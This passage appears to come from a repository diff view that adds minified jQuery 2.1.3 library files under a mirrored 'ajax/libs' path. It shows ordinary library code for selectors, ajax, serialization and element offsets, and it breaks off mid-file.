this.each(n.isFunction(a)?function(b){n(this).wrapInner(a.call(this,b))}:function(){var b=n(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=n.isFunction(a);return this.each(function(c){n(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){n.nodeName(this,"body")||n(this).replaceWith(this.childNodes)}).end()}}),n.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0},n.expr.filters.visible=function(a){return!n.expr.filters.hidden(a)};var wc=/%20/g,xc=/\[\]$/,yc=/\r?\n/g,zc=/^(?:submit|button|image|reset|file)$/i,Ac=/^(?:input|select|textarea|keygen)/i;function Bc(a,b,c,d){var e;if(n.isArray(b))n.each(b,function(b,e){c||xc.test(a)?d(a,e):Bc(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==n.type(b))d(a,b);else for(e in b)Bc(a+"["+e+"]",b[e],c,d)}n.param=function(a,b){var c,d=[],e=function(a,b){b=n.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=n.ajaxSettings&&n.ajaxSettings.traditional),n.isArray(a)||a.jquery&&!n.isPlainObject(a))n.each(a,function(){e(this.name,this.value)});else for(c in a)Bc(c,a[c],b,e);return d.join("&").replace(wc,"+")},n.fn.extend({serialize:function(){return n.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=n.prop(this,"elements");return a?n.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!n(this).is(":disabled")&&Ac.test(this.nodeName)&&!zc.test(a)&&(this.checked||!T.test(a))}).map(function(a,b){var c=n(this).val();return null==c?null:n.isArray(c)?n.map(c,function(a){return{name:b.name,value:a.replace(yc,"\r\n")}}):{name:b.name,value:c.replace(yc,"\r\n")}}).get()}}),n.ajaxSettings.xhr=function(){try{return new XMLHttpRequest}catch(a){}};var Cc=0,Dc={},Ec={0:200,1223:204},Fc=n.ajaxSettings.xhr();a.ActiveXObject&&n(a).on("unload",function(){for(var a in Dc)Dc[a]()}),k.cors=!!Fc&&"withCredentials"in Fc,k.ajax=Fc=!!Fc,n.ajaxTransport(function(a){var b;return k.cors||Fc&&!a.crossDomain?{send:function(c,d){var e,f=a.xhr(),g=++Cc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)f.setRequestHeader(e,c[e]);b=function(a){return function(){b&&(delete Dc[g],b=f.onload=f.onerror=null,"abort"===a?f.abort():"error"===a?d(f.status,f.statusText):d(Ec[f.status]||f.status,f.statusText,"string"==typeof f.responseText?{text:f.responseText}:void 0,f.getAllResponseHeaders()))}},f.onload=b(),f.onerror=b("error"),b=Dc[g]=b("abort");try{f.send(a.hasContent&&a.data||null)}catch(h){if(b)throw h}},abort:function(){b&&b()}}:void 0}),n.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return n.globalEval(a),a}}}),n.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET")}),n.ajaxTransport("script",function(a){if(a.crossDomain){var b,c;return{send:function(d,e){b=n("<script>").prop({async:!0,charset:a.scriptCharset,src:a.url}).on("load error",c=function(a){b.remove(),c=null,a&&e("error"===a.type?404:200,a.type)}),l.head.appendChild(b[0])},abort:function(){c&&c()}}}});var Gc=[],Hc=/(=)\?(?=&|$)|\?\?/;n.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=Gc.pop()||n.expando+"_"+cc++;return this[a]=!0,a}}),n.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(Hc.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Hc.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=n.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(Hc,"$1"+e):b.jsonp!==!1&&(b.url+=(dc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||n.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,Gc.push(e)),g&&n.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),n.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||l;var d=v.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=n.buildFragment([a],b,e),e&&e.length&&n(e).remove(),n.merge([],d.childNodes))};var Ic=n.fn.load;n.fn.load=function(a,b,c){if("string"!=typeof a&&Ic)return Ic.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=n.trim(a.slice(h)),a=a.slice(0,h)),n.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(e="POST"),g.length>0&&n.ajax({url:a,type:e,dataType:"html",data:b}).done(function(a){f=arguments,g.html(d?n("<div>").append(n.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,f||[a.responseText,b,a])}),this},n.expr.filters.animated=function(a){return n.grep(n.timers,function(b){return a===b.elem}).length};var Jc=a.document.documentElement;function Kc(a){return n.isWindow(a)?a:9===a.nodeType&&a.defaultView}n.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=n.css(a,"position"),l=n(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=n.css(a,"top"),i=n.css(a,"left"),j=("absolute"===k||"fixed"===k)&&(f+i).indexOf("auto")>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),n.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},n.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){n.offset.setOffset(this,a,b)});var b,c,d=this[0],e={top:0,left:0},f=d&&d.ownerDocument;if(f)return b=f.documentElement,n.contains(b,d)?(typeof d.getBoundingClientRect!==U&&(e=d.getBoundingClientRect()),c=Kc(f),{top:e.top+c.pageYOffset-b.clientTop,left:e.left+c.pageXOffset-b.clientLeft}):e},position:function(){if(this[0]){var a,b,c=this[0],d={top:0,left:0};return"fixed"===n.css(c,"position")?b=c.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),n.nodeName(a[0],"html")||(d=a.offset()),d.top+=n.css(a[0],"borderTopWidth",!0),d.left+=n.css(a[0],"borderLeftWidth",!0)),{top:b.top-d.top-n.css(c,"marginTop",!0),left:b.left-d.left-n.css(c,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||Jc;while(a&&!n.nodeName(a,"html")&&"static"===n.css(a,"position"))a=a.offsetParent;return a||Jc})}}),n.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(b,c){var d="pageYOffset"===c;n.fn[b]=function(e){return J(this,function(b,e,f){var g=Kc(b);return void 0===f?g?g[c]:b[e]:void(g?g.scrollTo(d?a.pageXOffset:f,d?f:a.pageYOffset):b[e]=f)},b,e,arguments.length,null)}}),n.each(["top","left"],function(a,b){n.cssHooks[b]=yb(k.pixelPosition,function(a,c){return c?(c=xb(a,b),vb.test(c)?n(a).position()[b]+"px":c):void 0})}),n.each({Height:"height",Width:"width"},function(a,b){n.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){n.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return J(this,function(b,c,d){var e;return n.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var Lc=a.jQuery,Mc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=Mc),b&&a.jQuery===n&&(a.jQuery=Lc),n},typeof b===U&&(a.jQuery=a.$=n),n});
     5 + 
  • ■ ■ ■ ■ ■
    pubg/notp/ajax/libs/jquery/2-1-3/jquery.min.js
     1 +/*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
     2 +!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.3",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)+1>=0},isPlainObject:function(a){return"object"!==n.type(a)||a.nodeType||n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=hb(),z=hb(),A=hb(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-1},K="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",L="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N=M.replace("w","w#"),O="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+N+"))|)"+L+"*\\]",P=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+O+")*)|.*)\\)|)",Q=new RegExp(L+"+","g"),R=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),S=new RegExp("^"+L+"*,"+L+"*"),T=new RegExp("^"+L+"*([>+~]|"+L+")"+L+"*"),U=new RegExp("="+L+"*([^\\]'\"]*?)"+L+"*\\]","g"),V=new RegExp(P),W=new RegExp("^"+N+"$"),X={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new RegExp("^"+O),PSEUDO:new RegExp("^"+P),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+L+"*(even|odd|(([+-]|)(\\d*)n|)"+L+"*(?:([+-]|)"+L+"*(\\d+)|))"+L+"*\\)|)","i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+L+"*((?:-\\d)?\\d*)"+L+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},eb=function(){m()};try{H.apply(E=I.call(v.childNodes),v.childNodes),E[v.childNodes.length].nodeType}catch(fb){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function gb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],k=b.nodeType,"string"!=typeof a||!a||1!==k&&9!==k&&11!==k)return d;if(!e&&p){if(11!==k&&(f=_.exec(a)))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return H.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName)return H.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=1!==k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+rb(o[l]);w=ab.test(a)&&pb(b.parentNode)||b,x=o.join(",")}if(x)try{return H.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function hb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ib(a){return a[u]=!0,a}function jb(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function kb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function lb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function nb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function ob(a){return ib(function(b){return b=+b,ib(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function pb(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=gb.support={},f=gb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=gb.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=g.documentElement,e=g.defaultView,e&&e!==e.top&&(e.addEventListener?e.addEventListener("unload",eb,!1):e.attachEvent&&e.attachEvent("onunload",eb)),p=!f(g),c.attributes=jb(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=jb(function(a){return a.appendChild(g.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(g.getElementsByClassName),c.getById=jb(function(a){return o.appendChild(a).id=u,!g.getElementsByName||!g.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(g.querySelectorAll))&&(jb(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\f]' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+L+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+L+"*(?:value|"+K+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),jb(function(a){var b=g.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&jb(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",P)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===g||a.ownerDocument===v&&t(v,a)?-1:b===g||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,h=[a],i=[b];if(!e||!f)return a===g?-1:b===g?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return lb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?lb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},g):n},gb.matches=function(a,b){return gb(a,null,null,b)},gb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return gb(b,n,null,[a]).length>0},gb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},gb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},gb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},gb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=gb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=gb.selectors={cacheLength:50,createPseudo:ib,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||gb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&gb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+L+")"+a+"("+L+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=gb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(Q," ")+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||gb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ib(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ib(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?ib(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ib(function(a){return function(b){return gb(a,b).length>0}}),contains:ib(function(a){return a=a.replace(cb,db),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ib(function(a){return W.test(a||"")||gb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:ob(function(){return[0]}),last:ob(function(a,b){return[b-1]}),eq:ob(function(a,b,c){return[0>c?c+b:c]}),even:ob(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:ob(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:ob(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:ob(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=mb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=nb(b);function qb(){}qb.prototype=d.filters=d.pseudos,d.setFilters=new qb,g=gb.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in 